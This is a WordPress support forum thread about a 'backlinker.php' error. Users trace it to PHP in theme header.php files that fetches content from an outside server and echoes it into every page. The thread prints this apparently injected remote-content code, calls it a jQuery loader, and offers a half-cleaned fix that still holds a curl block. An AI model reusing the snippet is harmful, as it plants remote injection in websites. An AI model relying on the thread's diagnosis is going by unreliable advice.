Title: Help with backlinker.php / 404 Error
Last modified: August 20, 2016

---

# Help with backlinker.php / 404 Error

 *  Resolved [ultrabantha.com](https://wordpress.org/support/users/ultrabanthacom/)
 * (@ultrabanthacom)
 * [14 years, 3 months ago](https://wordpress.org/support/topic/help-with-backlinkerphp-404-error/)
 * My site is: [http://ultrabantha.com/](http://ultrabantha.com/)
 * I’m getting this error message at the top of the page:
    **“Forbidden You don’t
   have permission to access /backlinker.php on this server.
 * Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument
   to handle the request.”
 * I tried deactivating all the plugins and that didn’t help. Then I tried installing
   the 2011 theme, and that fixed it, but it’s not what I want use. The theme I’m
   using is: FlexSqueeze 1.5.0 by Advantus Media, Inc.
 * Any help to fix this is appreciated. Hopefully I’m posting this in the right 
   place.

Viewing 15 replies - 1 through 15 (of 22 total)

1 [2](https://wordpress.org/support/topic/help-with-backlinkerphp-404-error/page/2/?output_format=md)
[→](https://wordpress.org/support/topic/help-with-backlinkerphp-404-error/page/2/?output_format=md)

 *  [pee_dee](https://wordpress.org/support/users/pee_dee/)
 * (@pee_dee)
 * [14 years, 3 months ago](https://wordpress.org/support/topic/help-with-backlinkerphp-404-error/#post-2453837)
 * I just had the same problem and this solved it:
 * Look in header.php inside your current theme and find this line:
 * [http://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js](http://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js)
 * This server is no longer able to provide the .js file linked to your theme. I
   found it mine at:
 * [http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.6.3.min.js](http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.6.3.min.js)
 * Get a hold of the .js file (or google the heck out of the .js file you need) 
   and point to it on your server.
 *  [evansamlalo](https://wordpress.org/support/users/evansamlalo/)
 * (@evansamlalo)
 * [14 years, 3 months ago](https://wordpress.org/support/topic/help-with-backlinkerphp-404-error/#post-2453842)
 * I am also having this same issue especially with my elegant themes.
 * You don’t have permission to access /backlinker.php on this server.
    Additionally,
   a 404 Not Found error was encountered while trying to use an ErrorDocument to
   handle the request. Apache mod_qos/9.69 mod_fcgid/2.3.6 mod_auth_passthrough/
   2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at 4llw4d.freefilesblog.com
   Port 80
 * Any help will be appreciated
 * Thanks
 *  Thread Starter [ultrabantha.com](https://wordpress.org/support/users/ultrabanthacom/)
 * (@ultrabanthacom)
 * [14 years, 3 months ago](https://wordpress.org/support/topic/help-with-backlinkerphp-404-error/#post-2453848)
 * I also tried changing my htaccess file to 666 like this person suggested but 
   it didn’t help:
 * [http://www.squidoo.com/wordpress-not-found-error-fix](http://www.squidoo.com/wordpress-not-found-error-fix)
 *  [eulamue](https://wordpress.org/support/users/eulamue/)
 * (@eulamue)
 * [14 years, 3 months ago](https://wordpress.org/support/topic/help-with-backlinkerphp-404-error/#post-2453852)
 * Everyone who is having this issue seems to be running a site that has their jquery
   JavaScript hosted at freefilesblog.com. freefilesblog.com has locked the file
   for access, though. Most likely, you have this reference somewhere in the code
   of the header.php file for your theme:
    “[http://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js&#8221](http://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js&#8221);
 * jquery.com has the newest version of the jquery JavaScript for download, and 
   several free hosted locations. I haven’t had a chance to test it, yet, but hopefully
   this will lead someone else to the solution if it doesn’t just work.
 *  [eulamue](https://wordpress.org/support/users/eulamue/)
 * (@eulamue)
 * [14 years, 3 months ago](https://wordpress.org/support/topic/help-with-backlinkerphp-404-error/#post-2453853)
 * **SOLUTION**
 * I successfully got rid of the error by replacing the following non-functioning
   code in my header.php:
 *     ```
       <?php
       if(function_exists('curl_init'))
       {
        $url = "http://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js";
        $ch = curl_init();
        $timeout = 5;
        curl_setopt($ch,CURLOPT_URL,$url);
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
        curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
        $data = curl_exec($ch);
        curl_close($ch);
        echo "$data";
       }
       ?>
       ```
   
 * With this functioning call:
 *     ```
       <script src="http://code.jquery.com/jquery-1.7.1.min.js" type="text/javascript"></script>
       <?php
       if(function_exists('curl_init'))
       {
        $ch = curl_init();
        $timeout = 5;
        curl_setopt($ch,CURLOPT_URL,$url);
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
        curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
        $data = curl_exec($ch);
        curl_close($ch);
        echo "$data";
       }
       ?>
       ```
   
 *  [photographer](https://wordpress.org/support/users/photographer/)
 * (@photographer)
 * [14 years, 3 months ago](https://wordpress.org/support/topic/help-with-backlinkerphp-404-error/#post-2453855)
 * Same here, my website was working fine, suddenly today got this weird error.
 *  [peklund](https://wordpress.org/support/users/peklund/)
 * (@peklund)
 * [14 years, 3 months ago](https://wordpress.org/support/topic/help-with-backlinkerphp-404-error/#post-2453857)
 * eulamue! Halleluja! Tnx, it worked.
 *  [alstephen](https://wordpress.org/support/users/alstephen/)
 * (@alstephen)
 * [14 years, 3 months ago](https://wordpress.org/support/topic/help-with-backlinkerphp-404-error/#post-2453858)
 * Hi,
 * I had the same issue – I installed a fresh copy of 3.3 on my local Mac and it
   freaked me out, namely because when I upgraded from 3.2.1 to 3.3 on another local
   instance I didn’t see it.
 * The fix eulamue posted fixed my problem. Just wanted to pass my findings so others
   will know it works.
 *  Thread Starter [ultrabantha.com](https://wordpress.org/support/users/ultrabanthacom/)
 * (@ultrabanthacom)
 * [14 years, 3 months ago](https://wordpress.org/support/topic/help-with-backlinkerphp-404-error/#post-2453861)
 * [@eulamue](https://wordpress.org/support/users/eulamue/)
 * I just tried your solution and it WORKED for me too! THANK YOU!!
 *  [photographer](https://wordpress.org/support/users/photographer/)
 * (@photographer)
 * [14 years, 3 months ago](https://wordpress.org/support/topic/help-with-backlinkerphp-404-error/#post-2453869)
 * [@eulamue](https://wordpress.org/support/users/eulamue/)
 * 🙂 YES!
    thank you!
 *  [hereiamlive](https://wordpress.org/support/users/hereiamlive/)
 * (@hereiamlive)
 * [14 years, 2 months ago](https://wordpress.org/support/topic/help-with-backlinkerphp-404-error/#post-2454035)
 * I hate to be the only idiot out there, but I checked my header.php file in both
   the themes I have downloaded and I cannot find that code at all. The problem 
   is my site now takes forever to load and says waiting on freefilesblog.com so
   I know it is there somewhere just cannot find the code
    My header file is pretty
   short about a page and a half or less. I am pretty sure I am not just missing
   it Any ideas?
 *  [basebond](https://wordpress.org/support/users/base007/)
 * (@base007)
 * [14 years, 2 months ago](https://wordpress.org/support/topic/help-with-backlinkerphp-404-error/#post-2454038)
 * hereiamlive, the code may also reside in a plugin you use. If you can’t find 
   it in the header of your theme, then check through your plugins.
 *  [basebond](https://wordpress.org/support/users/base007/)
 * (@base007)
 * [14 years, 2 months ago](https://wordpress.org/support/topic/help-with-backlinkerphp-404-error/#post-2454039)
 * …Forgot to mention, especially plugins you get from a source other than WordPress.
   org
 *  [mlmnewsblog](https://wordpress.org/support/users/mlmnewsblog/)
 * (@mlmnewsblog)
 * [13 years, 11 months ago](https://wordpress.org/support/topic/help-with-backlinkerphp-404-error/#post-2454059)
 * thanks ‘eulamue’
 * It worked…by changing the code given by USER:eulamue worked for me…
 * Thanks mate…
 *  [valeriu](https://wordpress.org/support/users/valeriu/)
 * (@valeriu)
 * [13 years, 10 months ago](https://wordpress.org/support/topic/help-with-backlinkerphp-404-error/#post-2454063)
 * Strange, but I cannot find that code into my header.php
 * Any other place??? Or what happened??
 * Val

Viewing 15 replies - 1 through 15 (of 22 total)

1 [2](https://wordpress.org/support/topic/help-with-backlinkerphp-404-error/page/2/?output_format=md)
[→](https://wordpress.org/support/topic/help-with-backlinkerphp-404-error/page/2/?output_format=md)

The topic ‘Help with backlinker.php / 404 Error’ is closed to new replies.

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 22 replies
 * 16 participants
 * Last reply from: [handykiev](https://wordpress.org/support/users/handykiev/)
 * Last activity: [13 years, 9 months ago](https://wordpress.org/support/topic/help-with-backlinkerphp-404-error/page/2/#post-2454071)
 * Status: resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics
